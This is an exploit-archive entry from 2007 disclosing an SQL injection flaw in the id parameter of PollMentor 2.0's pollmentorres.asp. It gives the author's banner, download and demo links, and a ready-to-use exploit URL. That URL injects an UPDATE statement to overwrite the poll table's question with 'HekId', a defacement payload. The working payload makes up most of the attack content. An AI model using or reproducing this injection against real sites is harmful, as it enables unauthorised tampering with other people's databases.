PollMentor 2.0 (pollmentorres.asp id) SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : PollMentor 2.0 (pollmentorres.asp id) SQL Injection Vulnerability
# Published : 2007-02-13
# Author : SaO
# Previous Title : CascadianFAQ <= 4.1 (index.php) Remote SQL Injection Vulnerability
# Next Title : nabopoll 1.2 Remote Unprotected Admin Section Vulnerability

XxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxX
X                                       X
X Author  : SaO                         X
X Site    : wWw.SaoHackStyLe.cOm        X
X Contact : By.SaO[at]Hotmail[dot]com   X
X                                       X
X                                       X
XxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxX

# Script   : PollMentor v2.0
# Download : http://www.aspindir.com/indir.asp?id=4406
# Demo     : http://www.aspcode.net/products/pollmentor/demo/pollmentor.asp
# ?ug in   : pollmentorres.asp
# Exp.     : 
http://[site]/[script-path]/pollmentorres.asp?id=-1+UPDATE+poll+SET+question='HekId';--

# www.Syue.com [2007-02-13]